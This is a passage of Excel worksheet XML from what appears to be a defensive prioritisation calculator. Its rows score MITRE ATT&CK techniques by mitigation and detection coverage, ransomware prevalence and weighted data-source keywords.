        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.1902857142857148E-2</v>
      </c>
      <c r="AQ291" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>9.5231746031746042E-2</v>
      </c>
      <c r="AR291" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>9.5231746031746042E-2</v>
      </c>
      <c r="AS291" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT291" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU29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92" spans="1:47" ht="96">
      <c r="A292" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.3566666666666661E-2</v>
      </c>
      <c r="B292" s="25">
        <f>SUM(H292,M292,V292)*(1+SUM(AE292,AG292,AI292,AK292,AM292))</f>
        <v>0.33566666666666667</v>
      </c>
      <c r="C292" s="25" t="s">
        <v>1217</v>
      </c>
      <c r="D292" s="25" t="s">
        <v>208</v>
      </c>
      <c r="E292" s="25" t="s">
        <v>1218</v>
      </c>
      <c r="F292" s="51">
        <v>1</v>
      </c>
      <c r="G292" s="51">
        <v>1</v>
      </c>
      <c r="H292" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I292">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J292">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K292">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L292">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M292" s="25">
        <v>0</v>
      </c>
      <c r="N292" s="51">
        <v>0</v>
      </c>
      <c r="O292" s="51">
        <v>1</v>
      </c>
      <c r="P292" s="51">
        <v>1</v>
      </c>
      <c r="Q292" s="51">
        <v>0</v>
      </c>
      <c r="R292" s="52" t="s">
        <v>366</v>
      </c>
      <c r="S292" s="51">
        <v>7</v>
      </c>
      <c r="T292" s="52" t="s">
        <v>1219</v>
      </c>
      <c r="U292" s="51">
        <v>8</v>
      </c>
      <c r="V292" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.15238095238095237</v>
      </c>
      <c r="W292">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>15</v>
      </c>
      <c r="X292">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.27272727272727271</v>
      </c>
      <c r="Y292">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.27272727272727271</v>
      </c>
      <c r="Z292">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>2</v>
      </c>
      <c r="AA292">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.02</v>
      </c>
      <c r="AB292">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.02</v>
      </c>
      <c r="AC292" s="29" t="s">
        <v>1220</v>
      </c>
      <c r="AD292" s="25" t="str" cm="1">
        <f t="array" ref="AD292">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC292)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE292" s="25">
        <f>IF(AD292="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF292" s="25" t="str" cm="1">
        <f t="array" ref="AF292">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC292)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG292" s="25">
        <f>IF(AF292="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH292" s="25" t="str" cm="1">
        <f t="array" ref="AH292">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC292)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI292" s="25">
        <f>IF(AH292="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ292" s="25" t="str" cm="1">
        <f t="array" ref="AJ292">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC292)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK292" s="25">
        <f>IF(AJ292="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL292" s="25" t="str" cm="1">
        <f t="array" ref="AL292">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC292)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AM292" s="25">
        <f>IF(AL292="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN292" s="52">
        <v>0</v>
      </c>
      <c r="AO292" s="51">
        <v>0</v>
      </c>
      <c r="AP292" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.3566666666666661E-2</v>
      </c>
      <c r="AQ292" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.11188888888888888</v>
      </c>
      <c r="AR292" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.11188888888888888</v>
      </c>
      <c r="AS292" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT292" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU29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93" spans="1:47" ht="32.1">
      <c r="A293" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.6266666666666668E-2</v>
      </c>
      <c r="B293" s="25">
        <f>SUM(H293,M293,V293)*(1+SUM(AE293,AG293,AI293,AK293,AM293))</f>
        <v>0.32933333333333337</v>
      </c>
      <c r="C293" s="25" t="s">
        <v>1221</v>
      </c>
      <c r="D293" s="25" t="s">
        <v>414</v>
      </c>
      <c r="E293" s="25" t="s">
        <v>1222</v>
      </c>
      <c r="F293" s="51">
        <v>1</v>
      </c>
      <c r="G293" s="51">
        <v>1</v>
      </c>
      <c r="H293" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I293">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J293">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K293">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L293">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M293" s="25">
        <v>0</v>
      </c>
      <c r="N293" s="51">
        <v>0</v>
      </c>
      <c r="O293" s="51">
        <v>1</v>
      </c>
      <c r="P293" s="51">
        <v>0</v>
      </c>
      <c r="Q293" s="51">
        <v>0</v>
      </c>
      <c r="R293" s="52" t="s">
        <v>423</v>
      </c>
      <c r="S293" s="51">
        <v>3</v>
      </c>
      <c r="T293" s="51" t="s">
        <v>1223</v>
      </c>
      <c r="U293" s="51">
        <v>12</v>
      </c>
      <c r="V293" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.14761904761904762</v>
      </c>
      <c r="W293">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>15</v>
      </c>
      <c r="X293">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.27272727272727271</v>
      </c>
      <c r="Y293">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.27272727272727271</v>
      </c>
      <c r="Z293">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA293">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB293">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC293" s="29" t="s">
        <v>424</v>
      </c>
      <c r="AD293" s="25" t="str" cm="1">
        <f t="array" ref="AD293">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC293)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE293" s="25">
        <f>IF(AD293="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF293" s="25" t="str" cm="1">
        <f t="array" ref="AF293">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC293)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG293" s="25">
        <f>IF(AF293="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH293" s="25" t="str" cm="1">
        <f t="array" ref="AH293">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC293)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI293" s="25">
        <f>IF(AH293="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ293" s="25" t="str" cm="1">
        <f t="array" ref="AJ293">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC293)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK293" s="25">
        <f>IF(AJ293="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL293" s="25" t="str" cm="1">
        <f t="array" ref="AL293">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC293)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM293" s="25">
        <f>IF(AL293="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN293" s="60">
        <v>1</v>
      </c>
      <c r="AO293" s="51">
        <v>1</v>
      </c>
      <c r="AP293" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.6266666666666668E-2</v>
      </c>
      <c r="AQ293" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.10977777777777779</v>
      </c>
      <c r="AR293" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.10977777777777779</v>
      </c>
      <c r="AS293" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT293" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU29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94" spans="1:47">
      <c r="A294" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.2998095238095242E-2</v>
      </c>
      <c r="B294" s="25">
        <f>SUM(H294,M294,V294)*(1+SUM(AE294,AG294,AI294,AK294,AM294))</f>
        <v>0.29664761904761905</v>
      </c>
      <c r="C294" s="25" t="s">
        <v>1224</v>
      </c>
      <c r="D294" s="25" t="s">
        <v>984</v>
      </c>
      <c r="E294" s="25" t="s">
        <v>1225</v>
      </c>
      <c r="F294" s="51">
        <v>1</v>
      </c>
      <c r="G294" s="51">
        <v>1</v>
      </c>
      <c r="H294" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I294">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J294">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K294">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L294">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M294" s="25">
        <v>0</v>
      </c>
      <c r="N294" s="51">
        <v>0</v>
      </c>
      <c r="O294" s="51">
        <v>0</v>
      </c>
      <c r="P294" s="51">
        <v>1</v>
      </c>
      <c r="Q294" s="51">
        <v>2</v>
      </c>
      <c r="R294" s="52" t="s">
        <v>1226</v>
      </c>
      <c r="S294" s="51">
        <v>3</v>
      </c>
      <c r="T294" s="51" t="s">
        <v>1227</v>
      </c>
      <c r="U294" s="51">
        <v>11</v>
      </c>
      <c r="V294" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.14761904761904762</v>
      </c>
      <c r="W294">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>14</v>
      </c>
      <c r="X294">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.25454545454545452</v>
      </c>
      <c r="Y294">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.25454545454545452</v>
      </c>
      <c r="Z294">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>3</v>
      </c>
      <c r="AA294">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.03</v>
      </c>
      <c r="AB294">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.03</v>
      </c>
      <c r="AC294" s="29" t="s">
        <v>1021</v>
      </c>
      <c r="AD294" s="25" t="str" cm="1">
        <f t="array" ref="AD294">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC294)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE294" s="25">
        <f>IF(AD294="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF294" s="25" t="str" cm="1">
        <f t="array" ref="AF294">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC294)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG294" s="25">
        <f>IF(AF294="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH294" s="25" t="str" cm="1">
        <f t="array" ref="AH294">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC294)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI294" s="25">
        <f>IF(AH294="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ294" s="25" t="str" cm="1">
        <f t="array" ref="AJ294">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC294)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK294" s="25">
        <f>IF(AJ294="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL294" s="25" t="str" cm="1">
        <f t="array" ref="AL294">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC294)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM294" s="25">
        <f>IF(AL294="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN294" s="52">
        <v>1</v>
      </c>
      <c r="AO294" s="51">
        <v>1</v>
      </c>
      <c r="AP294" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.2998095238095242E-2</v>
      </c>
      <c r="AQ294" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>9.8882539682539683E-2</v>
      </c>
      <c r="AR294" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>9.8882539682539683E-2</v>
      </c>
      <c r="AS294" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT294" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU29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95" spans="1:47" ht="63.95">
      <c r="A295" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.8030476190476192E-2</v>
      </c>
      <c r="B295" s="25">
        <f>SUM(H295,M295,V295)*(1+SUM(AE295,AG295,AI295,AK295,AM295))</f>
        <v>0.28030476190476195</v>
      </c>
      <c r="C295" s="25" t="s">
        <v>1228</v>
      </c>
      <c r="D295" s="25" t="s">
        <v>202</v>
      </c>
      <c r="E295" s="25" t="s">
        <v>1229</v>
      </c>
      <c r="F295" s="51">
        <v>1</v>
      </c>
      <c r="G295" s="51">
        <v>1</v>
      </c>
      <c r="H295" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I295">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J295">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K295">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L295">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M295" s="25">
        <v>0</v>
      </c>
      <c r="N295" s="51">
        <v>0</v>
      </c>
      <c r="O295" s="51">
        <v>1</v>
      </c>
      <c r="P295" s="51">
        <v>0</v>
      </c>
      <c r="Q295" s="51">
        <v>0</v>
      </c>
      <c r="R295" s="52" t="s">
        <v>161</v>
      </c>
      <c r="S295" s="51">
        <v>7</v>
      </c>
      <c r="T295" s="52" t="s">
        <v>1230</v>
      </c>
      <c r="U295" s="51">
        <v>8</v>
      </c>
      <c r="V295" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.14761904761904762</v>
      </c>
      <c r="W295">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>15</v>
      </c>
      <c r="X295">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.27272727272727271</v>
      </c>
      <c r="Y295">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.27272727272727271</v>
      </c>
      <c r="Z295">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA295">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB295">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC295" s="29" t="s">
        <v>1231</v>
      </c>
      <c r="AD295" s="25" t="str" cm="1">
        <f t="array" ref="AD295">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC295)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE295" s="25">
        <f>IF(AD295="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF295" s="25" t="str" cm="1">
        <f t="array" ref="AF295">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC295)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG295" s="25">
        <f>IF(AF295="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH295" s="25" t="str" cm="1">
        <f t="array" ref="AH295">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC295)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI295" s="25">
        <f>IF(AH295="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ295" s="25" t="str" cm="1">
        <f t="array" ref="AJ295">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC295)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK295" s="25">
        <f>IF(AJ295="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL295" s="25" t="str" cm="1">
        <f t="array" ref="AL295">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC295)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM295" s="25">
        <f>IF(AL295="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN295" s="60">
        <v>0</v>
      </c>
      <c r="AO295" s="51">
        <v>0</v>
      </c>
      <c r="AP295" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.8030476190476192E-2</v>
      </c>
      <c r="AQ295" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>9.3434920634920648E-2</v>
      </c>
      <c r="AR295" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>9.3434920634920648E-2</v>
      </c>
      <c r="AS295" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT295" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU29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96" spans="1:47" ht="48">
      <c r="A296" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.2370476190476198E-2</v>
      </c>
      <c r="B296" s="25">
        <f>SUM(H296,M296,V296)*(1+SUM(AE296,AG296,AI296,AK296,AM296))</f>
        <v>0.22370476190476196</v>
      </c>
      <c r="C296" s="25" t="s">
        <v>1232</v>
      </c>
      <c r="D296" s="25" t="s">
        <v>1233</v>
      </c>
      <c r="E296" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F296" s="51">
        <v>1</v>
      </c>
      <c r="G296" s="51">
        <v>0</v>
      </c>
      <c r="H296" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I296">
